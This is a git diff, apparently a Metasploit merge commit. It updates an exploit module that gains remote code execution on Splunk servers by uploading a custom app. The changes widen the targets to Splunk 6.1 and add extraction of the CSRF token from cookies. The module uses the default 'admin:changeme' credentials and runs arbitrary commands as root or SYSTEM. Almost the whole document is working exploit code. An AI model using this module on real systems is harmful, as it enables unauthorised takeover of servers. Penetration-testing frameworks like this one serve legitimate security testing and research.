Merge rapid7#3507 into local, recently updated branch of master for landing

Author: jhart-r7

modules/exploits/multi/http/splunk_upload_app_exec.rb

@@ -12,22 +12,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Splunk 5.0 Custom App Remote Code Execution',
+      'Name'           => 'Splunk Custom App Remote Code Execution',
       'Description'    => %q{
           This module exploits a feature of Splunk whereby a custom application can be
         uploaded through the web based interface. Through the 'script' search command a
         user can call commands defined in their custom application which includes arbitrary
         perl or python code. To abuse this behavior, a valid Splunk user with the admin
         role is required. By default, this module uses the credential of "admin:changeme",
         the default Administrator credential for Splunk. Note that the Splunk web interface
-        runs as SYSTEM on Windows, or as root on Linux by default. This module has only
-        been tested successfully against Splunk 5.0.
+        runs as SYSTEM on Windows, or as root on Linux by default. This module has been
+        tested successfully against Splunk 5.0, 6.1, and 6.1.1.
       },
       'Author'         =>
         [
           "marcwickenden", # discovery and metasploit module
           "sinn3r", # metasploit module
-          "juan vazquez" # metasploit module
+          "juan vazquez", # metasploit module
+          "Gary Blosser" # metasploit module updates for Splunk 6.1
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -44,13 +45,13 @@ def initialize(info = {})
       'Platform'       => %w{ linux unix win },
       'Targets'        =>
         [
-          [ 'Splunk 5.0.1 / Linux',
+          [ 'Splunk >= 5.0.1 / Linux',
             {
               'Arch'     => ARCH_CMD,
               'Platform' => %w{ linux unix }
             }
           ],
-          [ 'Splunk 5.0.1 / Windows',
+          [ 'Splunk >= 5.0.1 / Windows',
             {
               'Arch'     => ARCH_CMD,
               'Platform' => 'win'
@@ -96,6 +97,7 @@ def exploit
     # set up some variables for later use
     @auth_cookies = ''
     @csrf_form_key = ''
+    @csrf_form_port = "splunkweb_csrf_token_#{rport}" #Default to using rport, corrected during tokenization for v6 below.
     app_name = 'upload_app_exec'
     p = payload.encoded
     print_status("Using command: #{p}")
@@ -121,11 +123,11 @@ def exploit
     {
       'uri'     => '/en-US/api/search/jobs',
       'method'  => 'POST',
-      'cookie'  => @auth_cookies,
+      'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified)
       'headers' =>
         {
           'X-Requested-With' => 'XMLHttpRequest',
-          'X-Splunk-Form-Key' => @csrf_form_key
+          'X-Splunk-Form-Key' => @csrf_form_key   # Version 6 ignores extra headers (verified)
         },
       'vars_post' =>
         {
@@ -274,7 +276,7 @@ def do_upload_app(app_name, file_name)
     res = send_request_cgi({
       'uri'     => '/en-US/manager/appinstall/_upload',
       'method'  => 'POST',
-      'cookie'  => @auth_cookies,
+      'cookie'  => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Does not seem to require the cookie, but it does not break it. I bet 6.2 will have a cookie here too.
       'ctype'   => "multipart/form-data; boundary=#{boundary}",
       'data'    => data
     }, 30)
@@ -294,8 +296,20 @@ def do_get_csrf(uri)
       'method' => 'GET',
       'cookie' => @auth_cookies
     })
-    res.body.match(/FORM_KEY":\ "(\d+)"/)
+    res.body.match(/FORM_KEY":\ "(\d+)"/) # Version 5
     @csrf_form_key = $1
+
+    unless @csrf_form_key # Version 6
+      res.get_cookies.split(';').each {|c|
+        c.split(',').each {|v|
+          if v.split('=')[0] =~ /splunkweb_csrf_token/  #regex as the full name is something like splunkweb_csrf_token_8000
+            @csrf_form_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port
+            @csrf_form_key = v.split('=')[1]
+          end
+        }
+      }
+    end
+
     fail_with(Failure::Unknown, "csrf form Key not found") if not @csrf_form_key
   end